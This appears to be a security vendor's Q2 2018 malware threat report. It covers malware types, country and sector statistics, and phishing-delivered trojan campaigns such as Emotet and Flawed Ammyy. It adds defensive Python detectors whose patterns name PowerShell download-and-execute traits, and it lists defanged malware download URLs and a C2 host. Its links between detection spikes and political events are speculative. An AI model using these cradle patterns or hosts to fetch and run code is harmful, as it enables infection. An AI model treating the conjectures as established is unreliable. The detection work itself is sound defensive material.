In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the number one country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
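Because a packer replaces readable code with a compressed blob that a small stub unpacks at run time, two cheap static checks catch most stock UPX-style packing: the section names the packer leaves behind, and the entropy of each section's raw bytes. The following added example (not code from the report or from any Comodo tool) implements both with a minimal PE section-table reader; the threshold, the section-name set and the two synthetic PE images it checks are constructed for this example.

```python
import struct
from math import log2
from typing import List, Tuple

# Section names used by stock UPX (MUPX builds often keep them).
# Assumption for this example: any name in this set is treated as a packer marker.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
HIGH_ENTROPY_THRESHOLD = 7.0   # bits per byte; compressed or encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * log2(c / n) for c in counts if c)


def pe_sections(image: bytes) -> List[Tuple[str, bytes]]:
    """Walk the PE section table and return (name, raw_bytes) for each section.

    Only the fields needed to locate raw section data are parsed; this is a
    minimal reader written for this example, not a full PE loader.
    """
    if image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    coff = e_lfanew + 4                                   # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size                          # section table follows optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40                              # each section header is 40 bytes
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         image[raw_ptr:raw_ptr + raw_size]))
    return sections


def packer_indicators(image: bytes) -> List[str]:
    """Return human-readable reasons to suspect the image is packed (empty if none)."""
    reasons = []
    for name, data in pe_sections(image):
        if name in PACKER_SECTION_NAMES:
            reasons.append(f"section name {name!r} is a known packer marker")
        ent = shannon_entropy(data)
        if data and ent > HIGH_ENTROPY_THRESHOLD:
            reasons.append(f"section {name!r} has entropy {ent:.2f} bits/byte")
    return reasons


def build_sample_pe(sections: List[Tuple[bytes, bytes]]) -> bytes:
    """Construct a minimal, non-executable PE image for exercising the reader.

    Headers are zero except for the fields the reader uses; no optional header.
    """
    header_size = 64 + 4 + 20 + 40 * len(sections)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew -> PE signature at 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    table = bytearray()
    body = bytearray()
    for name, data in sections:
        raw_ptr = header_size + len(body)
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), 0,
                             len(data), raw_ptr, 0, 0, 0, 0, 0)
        body += data
    return bytes(dos) + b"PE\0\0" + coff + bytes(table) + bytes(body)


# Constructed samples: a plain-looking .text section and a UPX-style compressed layout.
PLAIN_IMAGE = build_sample_pe([(b".text", b"\x90" * 512 + b"Hello, world" * 40)])
PACKED_IMAGE = build_sample_pe([(b"UPX0", b""), (b"UPX1", bytes(range(256)) * 16)])

if __name__ == "__main__":
    for label, img in (("plain", PLAIN_IMAGE), ("packed", PACKED_IMAGE)):
        print(label, packer_indicators(img) or ["no packer indicators"])
```

Entropy alone also fires on legitimately compressed resources or embedded media, so treat a high-entropy section as a triage signal rather than a verdict.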
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty: it attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not only in one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but it now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and that it has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Distribution of top 30 Malware Families
In this list of the 30 top malware families, where trojans overwhelmingly dominate, you can find samples of this malware exhibiting diverse types of malicious activity.
For example, the leader of the attacks in Q2, TrojWare.Win32.Agent, is a trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server. And the downloaded malware can be of any type.
Number two in the list, TrojWare.JS.Clickjack, exhibits different activity: it makes users unintentionally click on hidden links. The link can be just another advertisement or lead to a malicious website to infect users with other types of malware.
TrojWare.JS.Faceliker just clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites. Then, when infected users open Facebook, Faceliker hijacks their "likes".
TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminal Command-and-Control server.
TrojWare.Win32.Injector uses process injection as its main technique to take malicious actions. It is mostly used to bypass security products.
TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It's usually spread via a phishing email.
Such diversity of malicious activity among trojans, and their special ability to hide, have always made them one of the hardest kinds of malware to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.
First among the trends is an explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data and then sending it to cybercriminals' servers.
See the accompanying graph of the most popular malware spread via email. Note that 18 of 20 are trojans.
Distribution of Phishing Families of Malware
2.1 The Most Widespread Trojan
The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.
If a user takes the bait and runs the file, it copies itself to appdata as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.
It collects credentials and private data from known browsers, email clients, FTP clients, and WebDAV and SCP clients. Then it sends all the collected data to the attackers' server httpcallbedmlpackfarefrephp.
The phishing email
2.2 PowerShell-based attack with Emotet
Another alarming trend is related to the malware itself rather than its delivery method. Often cybercriminals use malware based not on Windows native .exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.
Emotet is one of the most aggressive trojans currently active in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.
The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice that the message is written in a cheerful manner to inspire user trust.
The phishing email
The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special option to convince the victims to turn on VBScript execution.
The special option to convince the victims to turn on VBScript execution
The purpose of the VBScript is to launch PowerShell.
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlc, hxxpwwwthecyberconxioncomPUqUUe, hxxpEliasWesselcomvu6xGmS, hxxpmossbeachmusicdeXuBBN6r and hxxpairmaxxrswIdY (URL separators were lost in extraction).
At the time of writing, only the thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).
The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service, "lanesviewer", to ensure persistence.
The malware creates the "lanesviewer" service to ensure persistence
And after that Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.
The next example is even more cunning, because it infects computers using popular, legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software
The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.
Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.
The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.
As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.
The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. The Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.
The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. What is especially worth noticing is the fact that this trick is also based on using legitimate software, from Microsoft this time.
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.
The phishing email
IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download content and load it directly into MS Excel.
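An .iqy file is plain text, so a mail gateway or sandbox can read the query URL out of the attachment and apply policy to it before Excel ever does. The following added example (not code from the report or from Microsoft) parses the line-oriented IQY layout, "WEB", a version line, the URL, then optional Key=Value settings, and flags queries that are not HTTPS or do not point at an approved data source; the allowlist hostnames and both sample attachments are constructed for this example.

```python
from dataclasses import dataclass, field
from typing import Dict, List
from urllib.parse import urlsplit

# Assumption for this example: the organisation only expects Excel web queries
# to internal HTTPS data sources. These hostnames are constructed placeholders.
ALLOWED_HOSTS = {"reports.example.internal", "bi.example.internal"}


@dataclass
class IqyQuery:
    version: str
    url: str
    params: Dict[str, str] = field(default_factory=dict)


def parse_iqy(text: str) -> IqyQuery:
    """Parse the text of an .iqy (Excel web query) file.

    The file is line-oriented: a "WEB" type line, a version line, the query
    URL, then optional blank lines and Key=Value settings. A leading BOM,
    CRLF line endings and surrounding whitespace are tolerated.
    """
    lines = [ln.strip() for ln in text.lstrip("\ufeff").splitlines()]
    lines = [ln for ln in lines if ln != ""]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not a WEB query file")
    query = IqyQuery(version=lines[1], url=lines[2])
    for ln in lines[3:]:
        key, sep, value = ln.partition("=")
        if sep:
            query.params[key.strip()] = value.strip()
    return query


def triage_iqy(text: str) -> List[str]:
    """Return the policy findings for an IQY attachment (an empty list means it passed)."""
    findings = []
    try:
        query = parse_iqy(text)
    except ValueError as exc:
        return [f"unparseable: {exc}"]
    parts = urlsplit(query.url)
    host = (parts.hostname or "").lower()
    if parts.scheme.lower() != "https":
        findings.append(f"query uses scheme {parts.scheme or '(none)'!r}, not https")
    if host not in ALLOWED_HOSTS:
        findings.append(f"query host {host or '(none)'!r} is not an approved data source")
    # DisableRedirections is a real IQY setting; when it is False the server
    # can redirect the query elsewhere, so the URL alone does not fix the source.
    if query.params.get("DisableRedirections", "").lower() == "false":
        findings.append("redirections are enabled, so the final host may differ from the URL")
    return findings


# Constructed samples (not real attachments from the report).
BENIGN_IQY = "WEB\n1\nhttps://reports.example.internal/sales.csv\n\nSelection=AllTables\nFormatting=None\n"
SUSPICIOUS_IQY = "\ufeffWEB\r\n1\r\nhttp://updates.example-cdn.test/q?id=1\r\n\r\nDisableRedirections=False\r\n"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_IQY), ("suspicious", SUSPICIOUS_IQY)):
        print(label, triage_iqy(sample) or ["passed policy"])
```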
The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
Malware runs PowerShell
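Both chains described in this report, the Emotet document whose VBScript launches PowerShell and the IQY attachment that ends in PowerShell running Flawed Ammyy, share one observable: an Office application is the parent of a script host, and the PowerShell command line carries download-and-execute traits. The following added example (not code from the report or from any Comodo product) applies those two checks to normalised process-creation events; the field names, pattern list and sample events are constructed for this example, and the encoded-command value is a placeholder.

```python
import re
from typing import Dict, List

# Process-creation events as a SIEM might normalise them (constructed field names).
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}

# Command-line traits typical of download-and-execute cradles, checked only for PowerShell.
CRADLE_PATTERNS = [
    (re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s"), "encoded command"),
    (re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer"), "web download"),
    (re.compile(r"(?i)-(?:w|win|windowstyle)\s+hidden"), "hidden window"),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "dynamic evaluation"),
    (re.compile(r"(?i)\$env:temp|\\appdata\\local\\temp\\"), "temp-folder staging"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (forward slashes tolerated)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the detection reasons for one process-creation event (empty if benign)."""
    child = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")
    reasons = []
    if parent in OFFICE_HOSTS and child in SCRIPT_HOSTS:
        reasons.append(f"office application {parent} spawned script host {child}")
    if child in {"powershell.exe", "pwsh.exe"}:
        for pattern, label in CRADLE_PATTERNS:
            if pattern.search(cmd):
                reasons.append(f"powershell command line shows {label}")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over a batch and keep only the events that fired."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.append({"image": ev["image"], "parent_image": ev["parent_image"], "reasons": reasons})
    return hits


# Constructed events: a Word-to-PowerShell launch, an Excel-to-cmd chain, and two benign ones.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -w hidden -enc PLACEHOLDER_BASE64"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": "cmd.exe /c echo query"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(basename(hit["parent_image"]), "->", basename(hit["image"]), hit["reasons"])
```

The parent-child check is the higher-confidence signal; the command-line traits on their own also appear in some administrative scripts, so tune them against your own baseline.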
Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
2.4 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and the manipulation of users. This trend is a real gift for cybercriminals and a terrible nightmare for users.
